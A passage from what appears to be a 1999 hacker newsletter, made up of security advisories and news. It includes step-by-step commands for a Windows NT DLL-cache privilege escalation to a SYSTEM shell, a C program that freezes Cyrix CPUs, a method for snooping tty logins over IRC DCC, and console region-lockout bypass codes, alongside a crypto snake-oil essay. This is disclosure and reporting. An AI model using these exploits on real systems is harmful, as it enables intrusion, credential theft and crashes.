      point to a different location and recompile eggdll.dll)
              4. Copy the provided hackdll.exe and eggdll.dll to c:\temp
              5. Ensure that there is no file named c:\lockout. If there is,
      delete it. The exploit uses this file as a lockfile. 
              5. Delete the KERNEL32.DLL file-mapping object from the system cache:
                 c:\> cd\temp
                 c:\temp> hackdll -d kernel32.dll
              6. Insert the new file-mapping object with:
                 c:\temp> hackdll -a kernel32.dll c:\temp\eggdll.dll
                 Don't hit a key in this window after hitting enter.
              7. Now move to the other cmd.exe window that you started.
              8. Run a POSIX subsystem command. A good way to start it is:
                 c:\temp> posix /c calc
                 (if you have calculator installed. If not, pick some other program)
              9. Now the EGGDLL.DLL will prompt you with a few message boxes:
                 Say no to the "User is DOMAIN\DICK, Spawn Shell?" box.
                 Say no to the "User is \[garbage], Spawn Shell?" box.
                 Say YES to the "User is NT AUTHORITY\SYSTEM, Spawn Shell?" box.
                 Say YES to the "Winsta0" window station message box.
                 Say YES to the "Desktop" window desktop message box.
                 You will now see a "System Console" command.com shell open up.
                 (saying yes to the next 'winlogon' box will give you something
                  funny when you log out, btw :P)
              10. Now go back to your first cmd.exe window and hit a key to
                  unpoison the DLL cache.
              11. In the System Console window, run the User Manager program,
                  and modify Dick's account
                  (or anyone else's for that matter) to your hearts content.
                  (NT Server) c:\winnt\system32> usrmgr
                  (NT Workstation) c:\winnt\system32> musrmgr
      
      ---
      Source and Compiled Code:
      ---
      
              Exploit code can be downloaded from L0pht's website at
      http://www.l0pht.com/advisories.html. It is available in compiled form,
      and in pure source form as two zipfiles. The L0pht patch for this advisory
      is also available in both source form and compiled f orm from the same
      URL. 
      
      
      dildog@l0pht.com
      ---------------
      For more L0pht (that's L - zero - P - H - T) advisories check out:
      http://www.l0pht.com/advisories.html
      ---------------
      
      
 07.1 The l0pht's Quakenbush clearcase advisory
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
                          L0pht Security Advisory

                       Advisory released Jan. 21, 1999
           Application: Quakenbush Windows NT Password Appraiser

              Severity: Users of the tool Password Appraiser
                are unwittingly publishing NT user passwords to
            the internet (even if your company is behind a firewall).

                         Author: mudge@l0pht.com

                   http://www.l0pht.com/advisories.html


      
      ---------
      Overview :
      ---------
      
        During an internal analysis of a tool which claimed to audit NT passwords
        we noticed said tool sends users password hashes to a remote system
        on the internet via HTTP. In addition to this, should the password
        be known to the remote server, the plaintext equivalent is sent back
        across the internet to the querying machine. What this means, in a nutshell,
        is that if you are in any sort of organization connected to the internet -
        behind a firewall or not* - and you run this program: You send all of 
        your users passwords out through the internet. (* as long as you are 
        permitting {users,employees} to surf the web) 
      
        This of course, makes the fact that you are trusting a third party with
        your password information in the first place, a smaller concern by
        comparison.
      
        Quakenbush is aware of this problem - yet there have been no statements 
        that this will ever be fixed or addressed from them.
      
      -----------
      Disclaimer :
      -----------
      
        This is a touchy situation as the product in question can be viewed
        as a competitor to the L0pht's own L0phtCrack 2.51 tool. As such, we
        are going to do our best not to place any comparison on the two tools
        functionality, performace specs, etc. in this advisory as this is not a
        marketing blurb - but instead our regular service to the security 
        community. 
      
        In all good consciousness we could not keep it a secret that anyone who
        has run Password Appraiser has unwittingly exposed their private passwords. 
        We hope that various government agencies that are connected to the network 
        and run large NT installations were not bitten by this problem.
      
      ------------
      Description :
      ------------
      
        Password Appraiser is a tool that allows administrators to "Find accounts
        with weak passwords" [1] on NT systems. In actuality what it does is
        compare only the weaker LANMAN hash against a set of precomputed LANMAN
        hashes for a table lookup to see if the password is "weak".
      
        The Demo version *only* allows one to run the program via quering across
        the Internet. Other versions allow querying across the internet and/or
        a local dictionary containing a smaller subset of words/hashes.
      
        We were checking the program out locally in our labs and at the same time
        had taken a copy on an auditing gig of a large corporation ( >300,000 
        systems with huge NT domains and PDC's). We were interested in how this
        tool compared to L0phtcrack in real world situations.
      
        To see how the tool works we hooked up some network sniffers and
        ran the demo version on one of our test machines in our local labs. 
        Much to our surprise we watched the LANMAN hashes being sent IN THE CLEAR
        to pw.quakenbush.com. For the passwords that the server had in its
        dictionary a plaintext response was sent back. Our jaws dropped on the floor.
      
        A quick call to the l0pht member at the large corporation caught him
        just in time to prevent the running of the program on the corporations
        main PDC. A few seconds later and all >4000 users hashes (and any plaintext
        responses) would have been sent out, through the firewall, and across the
        internet.
      
        We know in the above situation that many of the users NT passwords were
        also the passwords that they chose for various remote access methods. This
        information could have been used to completely bypass the corporate firewall.
        
        So people realize that it is not just the plaintext responses that we are
        so concerned about - we captured some of the hashes that Password Appraiser
        could not crack and ran them through publicly available tools in brute 
        force mode to recover the passwords. 
      
        It is important to mention that user names are not sent across the wire.
        However, without the usernames the above threat is still quite real. The 
        problem lies the known quantities: the location/site that sent the 
        passwords, and the actual passwords.
      
        It is a trivial step to gather the usernames from this point forward. 
      
        [ Case examples: had the user accounts on our test machine been the 
         actual 7 members of the l0pht it would have been trivial to find our 
         e-mail names and try the passwords. With the large company, many of 
         the passwords were the same and though they would not have been 
         "cracked" by Password Appraiser, they were vulnerable to other tools
         performing NT password analysis. Determining valid usernames to try 
         with the recovered passwords is easily accomplished through enumeration
         on sites such as www.four11.com, and whois databases to name a few 
         resources.]
      
      
      --------
      Details :
      --------
      
        Sniffing traffic to port 80 of pw.quakenbush.com shows the following 
        information being exchanged:
      
        local client machine == [A]
        remote dictionary server [pw.quakenbush.com] == [B]
      
        [
         Example 1 - demonstrating vulnerability on Password Appraiser sending
         LANMAN hash and plaintext equivalent from "weak" password
        ] 
      
        [A] -> [B]
         GET /default.asp?cid=[*]&v=3086&pw=D85774CF671A9947AAD3B435B51404EE HTTP/1.1
         Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
         User-Agent: Microsoft URL Control - 6.00.8169
         Host: pw.quakenbush.com
      
        [*] Note - the cid is the verification mechanism so the server can 
            austensibly check that the client is indeed paid for. The number that
            was removed was the evaluation number that was automatically sent
            upon downloading the software. Its value is unimportant for this
            advisory.
      
        [B] -> [A]
         HTTP/1.1 200 OK
         Server: Microsoft-IIS/4.0
         Date: Wed, 20 Jan 1999 23:51:14 GMT
         Content-Type: text/html
         Cache-control: private
         Transfer-Encoding: chunked
      
         12
         ::PW::FOOBAR::PW::
         0
      
         From this, one can see that password appraiser only works on the deprecated
         LANMAN hash which is, in this case : D85774CF671A9947AAD3B435B51404EE
      
         The response shows that the password being checked was FOOBAR (case
         sensitivity is unknown as the program does not look at the NTLM hash).
      
         The above can be witnessed during any stage in transit to the quakenbush
         server. The attacker now has the password.
        
        [
         Example 2 - demonstrating vulnerability on Password Appraiser sending
         LANMAN hash of a "strong" password
        ] 
      
      
        [A] -> [B]
      
         GET /default.asp?cid=[*]&v=3086&pw=8F4272A6Fc6FDFDFAAD3B435B51404EE HTTP/1.1
         Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
         User-Agent: Microsoft URL Control - 6.00.8169
         Host: pw.quakenbush.com
      
        [B] -> [A]
      
         HTTP/1.1 200 OK
         Server: Microsoft-IIS/4.0
         Date: Thu, 21 Jan 1999 00:09:03 GMT
         Content-Type: text/html
         Cache-control: private
         Transfer-Encoding: chunked
      
         19
         ::PW::<not cracked>::PW::
         0
      
         Here, the LANMAN hash is : 8F4272A6FC6FDFDFAAD3B435B51404EE. We see from
         the response from Password Appraiser that it believes this password
         to be secure. Unfortunately, people sniffing the network who plug this
         hash into other tools take advantage of the weak design behind LANMAN [2]
         and retrieve the password of 'BOGUS!!' in under 1 minute.
      
      -----------
      Conclusion :
      -----------
      
        There are several good aspects to the Password Appraiser tool. 
        Unfortunately they appear to be in the non-security critical components. 
      
        The notion of sending such priveleged information [internal user 
        passwords and hashes] across the public networks is problematic. If
        there is no attempt at encryption then the attack is kindergarden level.
        If there is some sort of encrypted sleeve (ie an SSL session) then
        the attack is elevated a level but still possible as anyone can spoof
        as the server and harvest password hashes. Certificates would raise the
        bar even further but the problem of end-node security comes into play.
      
        One has to trust that the pw.quakenbush.com server is more secure than
        their corporate firewall or other protective measures. While in many 
        cases this might be true - there are undoubtedly cases where it is not.
        In these cases, since one has handed critical security information about 
        internal systems, the overal security is lowered due to the weakest link.
        
        The only way we saw to avoid this problem was to enable the end user to
        be completely self contained and not reliant upon external sources for
        cracking passwords.
      
        The moniker "Who has the keys to your business [3]" takes on an entire
        new light given the vulnerabilities in this advisory.
      
      mudge@l0pht.com
      ---------------
      For more L0pht (that's L - zero - P - H - T) advisories check out:
      http://www.l0pht.com/advisories.html
      ---------------
      
      
      References:
      --
      [1] quoted from Quakenbush web page at http://www.quakenbush.com/default.htm
      
      [2] information on some LANMAN hash weaknesses and other tools can be found
          at http://www.l0pht.com
      
      [3] "Who has the keys to your business" - Main slogan on 
          http://www.quakenbush.com     
      
      @HWA


 07.2 Hackers Get Their Final Fantasy
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   
     The hacker community didn't
     waste any time on tweaking
     modded systems to work with Square's new RPG.

     February 12, 1999 

     Within the time it takes to blink, restless hackers and code busters
     figured out how to bypass the Japanese version of Square's Final Fantasy
     VIII lockout mechanism, according to several sources that contacted
     IGNPSX today.

     Prior to today, owners of modified PlayStations who bought an imported
     Japanese version of FFVIII found that the tamper-sensitive game would
     not play on their systems, in an attempt to prevent exporters and other
     like-minded folk from playing it outside of Japan.

     However, within less than a day, Asian companies have found a solution
     to this apparently minor technical obstacle. A chip is available for
     PlayStations with older systems and newer systems, and National
     Console Support (www.ncsx.com) is retailing the chips for $78. These
     will be available by Monday, February 12, according to NCS.

     Another solution has also been found, this one for Gameshark owners.
     For those who own Game Shark v2.0, several variations of code are
     available.

     D009B182 0000
     8009B182 2402

     For use with any Magic Key or Pro Action Replay to boot FFVIII:

     D009B1B8 6D09
     8009B1B 8000

     Here's a variant of the code:

     D009B1B A002
     B009B1B A000

     For the record, IGNPSX does not in any way promote piracy of games
     or tampering of your system. After all, modding your PlayStation will
     void your warranty. We do, however, like to promote great games. For
     those of you able to purchase an import version of Final Fantasy VIII --
     and willing to forego one of the biggest aspects of the game, the story --
     then we do recommend purchasing the import version. Similarly, we also
     recommend waiting for the North American version when it arrives this
     fall -- the IGNPSX staff.

     @HWA


     
     
 08.0 dcc yerself some r00t
      ~~~~~~~~~~~~~~~~~~~~~      
      
      [ http://www.rootshell.com/ ]
      
      Date: Wed, 10 Feb 1999 14:24:55 -0800 (PST)
      From: Gregory Taylor <jest@ados.com>
      To: info@rootshell.com
      Subject: Re: New Exploit - DCCsnoop.txt
      
      Discovered by Gregory Taylor
      Febuary 5th, 1999
      
      It is possible to snoop a user's Linux connection through IRC..
      
      DCC Sending the device files /dev/ttyp1 - ? while someone is logged in on
      that ttyp to an outside client will send all information sent from that user
      to the target client, making it possible to snoop his connection, password
      and login
      
      The drawback is the user will not see his own information typed in and may
      disconnect, but for those with auto-login scripts, it is possible to recieve
      login/passwords, and even /dev/tty1 - etc. can be snooped for those logging
      in as root.. I would like some feedback on anyone who may have any ideas or
      comments about this.
      
      
      Gregory Taylor
      UNIX Systems Engineer
      American Digital Online Services
      
      ---------------------------------------------------------------------------
      - (877) ADOS.COM -- http://www.ados.com -- jest@ados.com ------------------
      ---------------------------------------------------------------------------
         
 09.0  Cyrix bug crashes cpus
       ~~~~~~~~~~~~~~~~~~~~~~
            
     Approved-By: aleph1@UNDERGROUND.ORG
     X-Homepage: http://personal.redestb.es/ragnar
     Date: 	Thu, 4 Feb 1999 16:50:21 +0100
     Reply-To: Ragnar Hojland Espinosa <tech.support@REDESTB.ES>
     Sender: Bugtraq List <BUGTRAQ@netspace.org>
     From: Ragnar Hojland Espinosa <tech.support@REDESTB.ES>
     Subject:      Cyrix bug: freeze in hell, badboy
     To: BUGTRAQ@netspace.org
     
     I emailed Cyrix a few months ago, and even managed to get a "oh, we will
     look at it" thanks to Rafael Reilova, but that was it till today.� A
     couple of people did report it, effectively, froze (most of) their Cyrix
     CPUs while running the opcodes below as non priviledged user.
     
     While I don't have the enough knowledge to assure this _is_ a CPU bug, it
     certainly looks like one to me (NO_LOCK isn't a workaround, btw).
     
     0x804a368 <the_data>:�� cwtl
     0x804a36a <the_data+2>: orl��� $0xe6ebe020,%eax
     0x804a36f <the_data+7>: jle��� 0x804a368 <the_data>
     
     Here is the code (tested with linux, any version):
     
     /* Please compile without optimizations */
     unsigned char the_data[] = { 62, 152, 13, 32, 224, 235, 230, 126, 247 };
     
     void (*badboy)();
     int main (int argc, char **argv)
     {
     �� badboy = (void(*)())(the_data);
     �� asm ("movl badboy,%eax");
     �� asm ("call *%eax");
     
     �� return 0;
     }
     
     If you try it, please send me your /proc/{cpuinfo,version} and if it
     freezes or not.
     --
     ____/|� Ragnar Hojland� (ragnar@lightside.ddns.org)����� Fingerprint� 94C4B
     \ o.O|�������������������������������������������������� 2F0D27DE025BE2302C
     =(_)=� "Thou shalt not follow the NULL pointer for����� 104B78C56 B72F0822
     �� U���� chaos and madness await thee at its end."������ hkp://keys.pgp.com
     
     
 10.0  Intel's big brother id chips on the new Pentium III's
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~     
        
       *******************************************************************    
       ***      /join #HWA.hax0r.news on EFnet the key is `zwen'       ***
       *******************************************************************
       
     
        "The lawyers at Intel won't say it's foolproof but it is as foolproof 
          as it can get."
                          - Computer Associates vice-president J.P. Corriveau,
                           on Intel's hardware security scheme for Pentium III's
  
        

       Chipping Away at Your Privacy 
       News Opinion Contributed by Justin Hill
       http://www.ntsecurity.net/scripts/loader.asp?iD=/news/whatprivacy.htm

       An excerpt:
       
       "If having a retrievable serial number on your processor bugs you, then 
      you'll sleep better knowing that a lot of hackers and crackers on the 
      planet are going to be playing around with ways to prove just how easy it
      will be to steal your personal serial number without your knowledge -- 
      doh! But on the flip side, if it's even remotely possible, they'll attempt
      to make software that can spoof the processor serial number when it's 
      requested, so if your a privacy fanatic, you'll probably want to get a copy
      of that program if and when it appears - heh."
      
      Yes I think he's right ... and another short excerpt:

      "And if that's not a big enough dent to your already-almost-nonexistent-
      privacy, then you'll probably want to puke up your pizza when you learn that
      at least three states, South Carolina, Florida, and Colorado, have all made 
      a rather thoughtless deal with a private business firm so that the firm may 
      purchase some 22 million driver's license  photos of private state citizens.
      That's right people, your governors were clinically brain dead that day, and
      now your picture might fall into the hands of whoever calls the shots at that
      private company -- all this and more for only pennies a photo. But wait, it 
      gets even worse ;-]"
  
  
      Check out the whole article its an interesting read, 
      http://www.ntsecurity.net/scripts/loader.asp?iD=/news/whatprivacy.htm
                * scooped from HNN (where else? krist those guys work hard ...)

 11.0 Security Snake Oil
      ~~~~~~~~~~~~~~~~~~
      
������Snake Oil
      
      
      
      The problem with bad security is that it looks just like good security.
      You can't tell the difference by looking at the finished product.� Both
      make the same security claims; both have the same functionality.� Both
      might even use the same algorithms: triple-DES, 1024-bit RSA, etc.�� Both
      might use the same protocols, implement the same standards, and have been
      endorsed by the same industry groups.� Yet one is secure and the other is
      insecure.
      
      Many cryptographers have likened this situation to the pharmaceutical
      industry before regulation.� The parallels are many: vendors can make any
      claims they want, consumers don't have the expertise to judge the accuracy
      of those claims, and there's no real liability on the part of the vendors
      (read the license you agree to when you buy a software security product).
      
      This is not to say that there are no good cryptography products on the
      market. There are.� There are vendors that try to create good products and
      to be honest in their advertising.� And there are vendors that believe they
      have good products when they don't, but they're just not skilled enough to
      tell the difference.� And there are vendors that are just out to make a
      quick buck, and honestly don't care if their product is good or not.
      
      Most products seem to fall into the middle category: well-meaning but
      insecure.� I've talked about the reason in previous CRYPTO-GRAM essays, but
      I'll summarize: anyone can create a cryptography product that he himself
      cannot break.� This means that a well-meaning person comes up with a new
      idea, or at least an idea that he has never heard of, cannot break it, and
      believes that he just discovered the magic elixir to cure all security
      problems.� And even if there's no magic elixir, the difficulty of creating
      secure products combined with the ease of making mistakes makes bad
      cryptography the rule.
      
      The term we use for bad cryptography products is "snake oil," which was the
      turn-of-the-century American term for quack medicine.� It brings to mind
      traveling medicine shows, and hawkers selling their special magic elixir
      that would cure any ailment you could imagine.
      
      For example, here is a paragraph from the most recent snake-oil
      advertisement I received in e-mail: "Encryptor 4.0 uses a unique in-house
      developed incremental base shift algorithm.� Decryption is practically
      
impossible, even if someone manages to reverse engineer our program to
      obtain the algorithm, the decryption of a file depends on the exact
      password (encryption key).� Even if someone is guessing the encryption key
      the file will only be decrypted correctly if the encryption key is 100
      percent correct.� See the IMPORTANT WARNING on our Web site
      
http://ten4.com/encryptor."� I checked the Web site; the odds that this
      product is any good are negligible.
      
      Elsewhere I've talked about building strong security products, using
      tried-and-true mathematics, and generally being conservative.� Here I want
      to talk about some of the common snake-oil warning signs, and how you can
      pre-judge products from their advertising claims.� These warning signs are
      not foolproof, but they're pretty good.
      
      Warning Sign #1: Pseudo-mathematical gobbledygook.� 
      
      In the quote above, notice the "unique in-house developed incremental base
      shift algorithm."� Does anyone have any idea what that means?� Are there
      any academic papers that discuss this concept?� Long noun chains don't
      automatically imply security.
      
      Meganet <http://www.meganet.com> has a beauty on their Web site: "The base
      of VME is a Virtual Matrix, a matrix of binary values which is infinity in
      size in theory and therefore have no redundant value.� The data to be
      encrypted is compared to the data in the Virtual Matrix.� Once a match is
      found, a set of pointers that indicate how to navigate inside the Virtual
      Matrix is created.� That set of pointers (which is worthless unless
      pointing to the right Virtual Matrix) is then further encrypted in dozens
      other algorithms in different stages to create an avalanche effect. The
      result is an encrypted file that even if decrypted is completely
      meaningless since the decrypted data is not the actual data but rather a
      set of pointers.� Considering that each session of VME has a unique
      different Virtual Matrix and that the data pattern within the Virtual
      Matrix is completely random and non-redundant, there is no way to derive
      the data out of the pointer set."� This makes no sense, even to an expert.
      
      US Data Security <http://www.usdsi.com> has another beauty: "From a
      mathematical point of view, the TTM algorithm is intuitively natural and
      less cumbersome to use than methods that are number-theory based."
      SuperKrypt <http://www.superkrypt.com/> tries to impress with an acronym:
      "SuperKrypt products utilize the DNGT bulk encryption method," whatever
      that is.� And Cennoid <http://www.cennoid.com> just doesn't understand what
      it's talking about: "Since key length and key structure vary and since the
      encryption engine does not use any mathematical algorithms, reverse
      engineering is impossible and guessing is not an option."
      
      The point here is that, like medicine, cryptography is a science.� It has a
      body of knowledge, and researchers are constantly improving that body of
      knowledge: designing new security methods, breaking existing security
      methods, building theoretical foundations, etc.� Someone who obviously does
      not speak the language of cryptography is not conversant with the
      literature, and is much less likely to have invented something good.� It's
      
as if your doctor started talking about "energy waves and healing
      vibrations."� You'd worry.
      
      Warning Sign #2: New mathematics.
      
      Every couple of years, some mathematician looks over at cryptography, says
      something like, "oh, that's easy," and proceeds to create an encryption
      algorithm out of whatever he has been working on.� Invariably it is lousy.� 
      
      Beware cryptography based on new paradigms or new areas of mathematics:
      chaos theory, neural networks, coding theory, zeta functions.� Cryptography
      is hard; the odds that someone without any experience in the field can
      revolutionize it are small.� And if someone does, let the academic
      community have a few years to understand it before buying products based on
      it.
      
      Warning Sign #3: Proprietary cryptography.
      
      I promise not to start another tirade about the problems of proprietary
      cryptography.� I just include it here as a warning sign.� So when a company
      like GenioUSA <http://www.geniousa.com/genio/> refuses to divulge what
      algorithm they're using (they claim it's "world class secret key
      encryption," whatever that means), you should think twice before using
      their product (it's completely broken, by the way).
      
      Another company, Crypt-o-Text <http://www.savard.com/crypt-o-text/>,
      promises a "complex proprietary encryption algorithm" and that "there is
      absolutely no way to determine what password was used by examining the
      encrypted text."� It was completely broken in an InfoWorld review.
      
      This kind of thing isn't exclusive to small companies.� Axent once tried to
      pass XOR off as a real encryption algorithm.� It wasn't until some peeked
      inside the compiled code that we discovered it.
      
      Any company that won't discuss its algorithms or protocols has something to
      hide.� There's no other possible reason.� (And don't let them tell you that
      it is patent-pending; as soon as they file the patent, they can discuss the
      technology.� If they're still working on the patent, tell them to come back
      after they can make their technology public.)
      
      Warning Sign #4: Extreme cluelessness.
      
      Some companies make such weird claims that it's obvious that they don't
      understand the field.� TriStrata says this about their encryption
      algorithm:� "Since TriStrata's encryption scheme is so simple and of such
      low computational complexity, the client portion can reside on a wide range
      of systems -- from a server to a portable PC."� Don't they realize that
      every encryption algorithm is small enough to fit on a portable PC, that
      DES and RSA and SHA can fit on an 8-bit smart card, and that you can
      implement some of the AES candidates in 17 clock cycles per byte or a few
      thousand gates?
      
      GenioUSA talks about why they don't use public-key cryptography in their
      product): "Public Key encryption is exactly that, you are not the only
      party involved in the generation, integrity, and security of all the
      keys/passwords used to encrypt your e-mail, documents, and files.� Public
      key encryption is great technology to use to exchange things with anyone
      you won't trust with your secret key(s) and/or can't exchange secret key(s)
      with.� We quote one sentence from a well known Web page, 'All known public
      
key cryptosystems, however, are subject to shortcut attacks and must
      therefore use keys ten or more times the lengths of those discussed here to
      achieve the an [sic] equivalent level of security.'"� So what?� This
      company just doesn't get it.
      
      Warning Sign #5: Ridiculous key lengths.
      
      Jaws Technology <http://www.jawstech.com> boasts: "Thanks to the JAWS L5
      algorithm's statistically unbreakable 4096 bit key, the safety of your most
      valued data files is ensured."� Meganet takes the ridiculous a step further
      <http://www.meganet.com>: "1 million bit symmetric keys -- The market
      offer's [sic] 40-160 bit only!!"
      
      Longer key lengths are better, but only up to a point.� AES will have
      128-bit, 192-bit, and 256-bit key lengths.� This is far longer than needed
      for the foreseeable future.� In fact, we cannot even imagine a world where
      256-bit brute force searches are possible.� It requires some fundamental
      breakthroughs in physics and our understanding of the universe.� For
      public-key cryptography, 2048-bit keys have same sort of property; longer
      is meaningless.
      
      Think of this as a sub-example of Warning Sign #4: if the company doesn't
      understand keys, do you really want them to design your security product?
      
      Warning Sign #6: One-time pads.
      
      One-time pads don't make sense for mass-market encryption products.� They
      may work in pencil-and-paper spy scenarios, they may work on the
      U.S.-Russia teletype hotline, but they don't work for you.� Most companies
      that claim they have a one-time pad actually do not.� They have something
      they think is a one-time pad.� A true one-time pad is provably secure
      (against certain attacks), but is also unusable.
      
      Elementrix, now defunct, announced a one-time pad product a few years ago,
      and refused to recant when it was shown that it was no such thing.� Ciphile
      Software <http://www.ciphile.com> just tries to pretend: "Original Absolute
      Privacy - Level3 is an automated pseudo one-time pad generator with very
      sophisticated and powerful augmenting features."� Whatever that means.
      
      More recently, TriStrata <http://www.tristrata.com> jumped on the world's
      cryptography stage by announcing that they had a one-time pad.� Since then,
      they've been thoroughly trounced by anyone with a grain of cryptographic
      sense and have deleted the phrase from their Web site.� At least they've
      exhibited learning behavior.
      
      Ultimate Privacy <http://www.ultimateprivacy.com> might actually use a
      one-time pad (although they claim to use Blowfish, too, which worries me):
      "The one time pad is a private key method of encryption, and requires the
      safe and secure distribution of the pad material, which serves as the key
      in our solution.� The security of the key distribution comes down to how
      secure you want to be -- for communicating point-to-point with one other
      person, we suggest a face-to-face hand-off of the pad material."� Remember
      that you need to hand off the same volume of bits as the message you want
      to send, otherwise you don't have a one-time pad anymore.
      
      Warning Sign #7: Unsubstantiated claims.
      
      Jaws Technologies says this about its new encryption technology: "This
      scientifically acclaimed encryption product is the world's strongest
      
commercially available software of its kind."� Acclaimed by who?� The Web
      site doesn't say.� World's strongest by what comparison?� Nothing.
      
      UBE98, at <http://www.parkie.ndirect.co.uk/>, stands for "unbreakable
      encryption," or at least it did before someone took a day to break it.� Its
      Web site makes the same sort of ridiculous claims:� "One of the Strongest
      Encryptions available in the UK in a program that everyone will understand
      how to use!"� Wow.� SenCrypt <http://www.ionmarketing.com/> is advertised
      to be "the most secure cryptographic algorithm known to mankind."� Double wow.
      
      Some companies claim "military-grade" security.� This is a meaningless
      term.� There's no such standard.� And at least in the U.S., military
      cryptography is not available for non-government purposes (although
      government contractors can get it for classified contracts).
      
      Other companies make claims about other algorithms that are "broken,"
      without giving details.� Or that public-key cryptography is useless.� Don't
      believe any of this stuff.� If the claim seems far-fetched, it probably is.
      If a company claims that their products have been reviewed by
      cryptographers, ask for names.� Ask for a copy of the review.� Counterpane
      Systems reviews many products, and our clients can give out the reviews if
      they choose.
      
      Warning Sign #8: Security proofs.
      
      There are two kinds of snake-oil proofs.� The first are real mathematical
      proofs that don't say anything about real security.� The second are fake
      proofs.� Meganet claims to have a proof that their VME algorithm is as
      secure as a one-time pad.� Their "proof" is to explain how a one-time pad
      works, add the magic spell "VME has the same phenomenon behavior patterns,
      hence proves to be equally strong and unbreakable as OTP," and then give
      the results of some statistical tests.� This is not a proof.� It isn't even
      close.
      
      More subtle are actual provably secure systems.� They do exist.� Last
      summer, IBM made a big press splash about their provably secure system,
      which they claimed would revolutionize the cryptography landscape.� (See
      <http://www.counterpane.com/crypto-gram-9809.html#cramer-shoup> for a
      discussion.)� Since then, the system has disappeared.� It's great research,
      but mathematical proofs have little to do with actual product security.
      
      Warning Sign #9: Cracking contests.
      
      I wrote about this at length last December:
      <http://www.counterpane.com/crypto-gram-9812.html#contests>.� For now,
      suffice it to say that cracking contests are no guarantee of security, and
      often mean that the designers don't understand what it means to show that a
      product is secure.
      
      Conclusion: Separating the Good from the Bad
      
      These snake-oil warning signs are neither necessary nor sufficient criteria
      for separating the good cryptography from the snake oil.� Just as there
      could be insecure products that don't trigger any of these nine warning
      signs, there could be secure products that look very much like snake oil.
      But most people don't have the time, patience, or expertise to perform the
      kind of analysis necessary to make an educated determination.� In the
      absence of a Food-and-Drug-Administration-like body to regulate
      
cryptography, the only thing a reasonable person can do is to use warning
      signs like these as guides.
      
      
      Further reading: The "Snake Oil" FAQ is an excellent source of information
      on questionable cryptographic products, and a good way to increase the
      sensitivity of your bullshit detector.� Get your copy at:
      <http://www.interhack.net/people/cmcurtin/snake-oil-faq.html>.
      

       @HWA
       
 11.1  U.S has new interim crypto legislature
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      Contributed by Ed, from CryptoGram a newsletter for all things crypto

      The U.S. has new interim cryptography export regulations.� The Department
      of Commerce issued new interim regulations on encryption export controls on
      December 31, 1998.� Products with DES can now be freely exported.� (Of
      course, we all know that DES can be broken in 21 hours by a bunch of
      amateurs, and a lot faster by professionals.)� Products with any key length
      can be exported to insurance companies, medical end-users, and online
      merchants (only for buying and selling goods), under the current exception
      available for banks.� Corporations can export to their subsidiaries for
      "internal company proprietary use"; some of this extends to partners of
      American companies.� Some of the licensing requirements on export of key
      escrow/key recovery systems have been removed.� These new regulations,
      announced in September, are targeted towards large corporations.
      Restrictions on the exports of strong encryption used for private,
      non-commercial reasons is still strictly limited.� Comments on the rules
      are due March 1, 1998.� A copy of the rules is available at:
      
http://www.epic.org/crypto/export_controls/bxa-regs-1298.html
      
      France reversed its long-standing position as being one of the most
      anti-cryptography countries in the world.� On January 19, Prime Minister
      Lionel Jospin announced the French government is relaxing its current
      restrictive policy on encryption.� Under the new policy, a key escrow
      system of "Trusted Third Parties" will no longer be required for domestic
      use, the 1996 law requiring TTPs will not be implemented, and users will be
      able to use up to 128-bit encryption without restrictions until a new law
      which
      eliminates all restrictions is enacted.� Rah rah.� The announcement is
      available in French at:
      
http://www.premier-ministre.gouv.fr/PM/D190199.HTM
      
http://www.internet.gouv.fr/francais/textesref/cisi190199/decis1.htm
      
http://www.internet.gouv.fr/francais/textesref/cisi190199/decis2.htm
      and a translation is at:
      
http://slashdot.org/articles/99/01/19/1255234.shtml
      
      In addition to adding a unique processor ID (see below) to its Pentium III
      chip, Intel is adding a hardware random number generator.� This is
      excellent news.� I know nothing about how it works (or even if it is any
      good), but using techniques such as Yarrow, we can take even a mediocre
      hardware random number generator and turn it into something that is good
      for cryptographic applications.
      
      There's a new Word-based virus named Caligula.� Caligula steals a
      user's PGP key ring and sends it to the creators' FTP site.� According
      to Network Associates (owners of PGP, having bought it in 1997), this
      doesn't compromise PGP security because the key ring file is useless
      without the passphrase.� This seems a bit optimistic; once the private key
      
ring is known, PGP's security level goes from unbreakable to that of a
      standard hashed passphrase.� And most people choose lousy passphrases.
      
http://www.techweb.com/wire/story/TWB19990205S0011
      
      Sun's Scott McNealy announced that we all have no privacy anyway, and might
      as well get used to it.� All the more troubling, Sun is a member of the
      Online Privacy Alliance.� With an attitude like McNealy's, is it hard to
      believe that "an industry coalition that seeks to head off government
      regulation of online consumer privacy in favor of an industry
      self-regulation approach" has my best interests at heart?
      
http://www.wired.com/news/news/politics/story/17538.html
      
      SECRET POWER is an excellent book about project Echelon, the NSA's secret
      program designed to eavesdrop on pretty much every piece of communication
      in the world.� The book isn't available in the U.S. (Amazon.com never heard
      of it, and I got my copy from a friend in New Zealand), but CovertAction
      Quarterly has an excellent article on the topic by the author:
      
http://www.caq.com/caq59/CAQ59GlobalSnoop.html
      And if you want to try to get the book, here are the details:� Nicky Hager,
      SECRET POWER, Craig Potton Publishing (Box 555, Nelson, New Zealand), 1996.
      See also:� http://www.gn.apc.org/duncan/echelon-dc.htm
      
 12.0  The Hacker Challenge by Qubik
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     The Hacker Challenge

     By: Qubik (qubik@bikkel.com)
     originally posted on HNN in BufferOverflow.

     You have probably read about them and some of you may have
     even participated in one or two. Hacker challenges; where your
     asked to bypass the latest security measure implemented into
     technology which is already, prior to testing, dubbed as the latest in
     computer protection. But for what in return? Most challenges offer a
     reward of some sorts, a reward which is more often than not, a five
     or six figure with a dollar sign placed neatly at the beginning. 

     So just what is the deal with these challenges? What purpose do
     they really serve and are they just marketing ploys? 

     I'd like you to imagine for a moment that you're an administrator of a
     small corporate network. It's not the most exciting of jobs, and you
     don't have time to keep up with the latest going ons in the security
     scene. Your network has been attacked a few times before, and
     you start to think about upgrading your security. So where do you
     start? 

     Where else would you start, but the internet? It's the worlds largest
     resource, and every good company dealing with network security, is
     bound to be on the internet somewhere. So you use a search
     engine or two and you come across a web site for a new state of
     the art firewall, who's manufacturers claim it resisted every hacker
